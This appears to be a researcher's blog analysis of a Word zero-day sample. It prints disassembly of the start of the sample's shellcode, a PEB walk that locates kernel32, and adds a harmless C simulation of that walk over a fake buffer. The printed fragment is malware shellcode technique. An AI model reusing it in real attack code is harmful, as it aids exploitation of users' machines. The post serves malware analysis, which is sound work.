Word 0Day
I think we received the 0Day at EADS on May 14th for the 1st time. I had a look at it then; after a few tries it finally managed to compromise my Office XP SP3 French (up to date) on a Windows XP SP1 French (up to date), but I thought it was way too unstable to cause wide trouble. I found the code quite ingenious, even if not very clean. There are 2 shellcode-finding shellcodes and a main one. The document embeds a XORed binary that is quite fun to analyze, but too long to fit in here :)

It's weird they chose to write to C:\ rather than a non-Administrator-writable directory... whatever, here is the shellcode-finding shellcode:

[code]seg000:00000520 FindShellcode_1:[/code]

Here is the main shellcode:

[code]seg000:00000B2E Shellcode:
seg000:00000B2E 90                   nop
seg000:00000B2F 90                   nop
seg000:00000B30
seg000:00000B30 GetKernel32BaseAddress:
seg000:00000B30 64 A1 30 00 00 00    mov     eax, dword ptr fs:unk_30   ; fs:[30h] = PEB
seg000:00000B36 8B 40 0C             mov     eax, [eax+0Ch]             ; PEB->Ldr
seg000:00000B39 8B 70 1C             mov     esi, [eax+1Ch]             ; Ldr->InInitializationOrderModuleList.Flink (1st entry: ntdll)
seg000:00000B3C AD                   lodsd                              ; eax = Flink of 1st entry -> 2nd entry (kernel32 on XP)
seg000:00000B3D 8B 70 08             mov     esi, [eax+8]               ; esi = 2nd entry's DllBase = kernel32 base
seg000:00000B40 E9 6A 02 00 00       jmp     GetEIP
seg000:00000B45
seg000:00000B45 ; Comments[/code]
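The five instructions of GetKernel32BaseAddress above are the classic PEB walk: fs:[30h] gives the PEB, +0Ch the Ldr, +1Ch the Flink of InInitializationOrderModuleList, one lodsd advances to the second entry, and +08h from that link is the entry's DllBase. The following C is an added example, not code from the original post or from the sample: it replays the same walk with the same offsets over a constructed 32-bit process image in which every "pointer" is an offset into a byte buffer, so it runs on any host. The layout offsets (PEB at 0, Ldr at 40h, the link entries and the module base values) are constructed assumptions; the list orders modelled are the Windows XP one the shellcode counts on (ntdll, kernel32) and the Windows 7 one (ntdll, kernelbase, kernel32), to show why a single hard-coded lodsd returns the wrong module on later systems.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added example, not code from the original post: the PEB walk of
 * GetKernel32BaseAddress replayed over a constructed 32-bit process image.
 * Every "pointer" is an offset into the buffer so this runs on any host. */

#define IMG_SIZE 0x200

/* Offsets exactly as the disassembly uses them. */
#define PEB_LDR            0x0C  /* PEB->Ldr */
#define LDR_INITORDER_LIST 0x1C  /* Ldr->InInitializationOrderModuleList.Flink */
#define LINK_FLINK         0x00  /* LIST_ENTRY.Flink */
#define LINK_DLLBASE       0x08  /* DllBase, relative to InInitializationOrderLinks */

/* Constructed layout (assumption): PEB at offset 0, i.e. where fs:[30h] points. */
#define PEB_OFF    0x000
#define LDR_OFF    0x040
#define NTDLL_LINK 0x080
#define KB_LINK    0x0A0
#define K32_LINK   0x0C0
#define NTDLL_BASE 0x7C900000u  /* fictitious ntdll.dll base      */
#define KB_BASE    0x75A00000u  /* fictitious kernelbase.dll base */
#define K32_BASE   0x7C800000u  /* fictitious kernel32.dll base   */

static uint32_t rd32(const uint8_t *img, uint32_t off) {
    uint32_t v;
    memcpy(&v, img + off, sizeof v);  /* little-endian host assumed */
    return v;
}

static void wr32(uint8_t *img, uint32_t off, uint32_t v) {
    memcpy(img + off, &v, sizeof v);
}

/* Link `prev` -> `cur` in the init-order list and record cur's DllBase. */
static void link_module(uint8_t *img, uint32_t prev, uint32_t cur, uint32_t base) {
    wr32(img, prev + LINK_FLINK, cur);
    wr32(img, cur + LINK_DLLBASE, base);
}

/* Build the fake image. with_kernelbase=0 gives the XP order the shellcode
 * expects (ntdll, kernel32); with_kernelbase=1 gives the Windows 7 order
 * (ntdll, kernelbase, kernel32). */
void build_fake_image(uint8_t *img, int with_kernelbase) {
    uint32_t head = LDR_OFF + LDR_INITORDER_LIST, prev = head;
    memset(img, 0, IMG_SIZE);
    wr32(img, PEB_OFF + PEB_LDR, LDR_OFF);
    link_module(img, prev, NTDLL_LINK, NTDLL_BASE);
    prev = NTDLL_LINK;
    if (with_kernelbase) {
        link_module(img, prev, KB_LINK, KB_BASE);
        prev = KB_LINK;
    }
    link_module(img, prev, K32_LINK, K32_BASE);
    prev = K32_LINK;
    wr32(img, prev + LINK_FLINK, head);  /* circular list back to the head */
}

/* One-to-one with the five instructions of GetKernel32BaseAddress. */
uint32_t get_kernel32_base(const uint8_t *img, uint32_t peb) {
    uint32_t eax, esi;
    eax = peb;                                  /* mov eax, fs:[30h]  */
    eax = rd32(img, eax + PEB_LDR);             /* mov eax, [eax+0Ch] */
    esi = rd32(img, eax + LDR_INITORDER_LIST);  /* mov esi, [eax+1Ch] */
    eax = rd32(img, esi + LINK_FLINK);          /* lodsd              */
    esi = rd32(img, eax + LINK_DLLBASE);        /* mov esi, [eax+8]   */
    return esi;
}

uint32_t walk_xp_layout(void) {
    uint8_t img[IMG_SIZE];
    build_fake_image(img, 0);
    return get_kernel32_base(img, PEB_OFF);
}

uint32_t walk_win7_layout(void) {
    uint8_t img[IMG_SIZE];
    build_fake_image(img, 1);
    return get_kernel32_base(img, PEB_OFF);
}

int main(void) {
    printf("XP-style list   : 0x%08X (kernel32)\n", walk_xp_layout());
    printf("Win7-style list : 0x%08X (kernelbase, not kernel32)\n", walk_win7_layout());
    return 0;
}
```

On the XP-style list the walk returns the kernel32 base, on the Win7-style list it returns kernelbase's instead, which is why shellcode that counts entries rather than matching BaseDllName stops working across Windows versions; a name-matching walk is the usual fix, but it is not what this sample does.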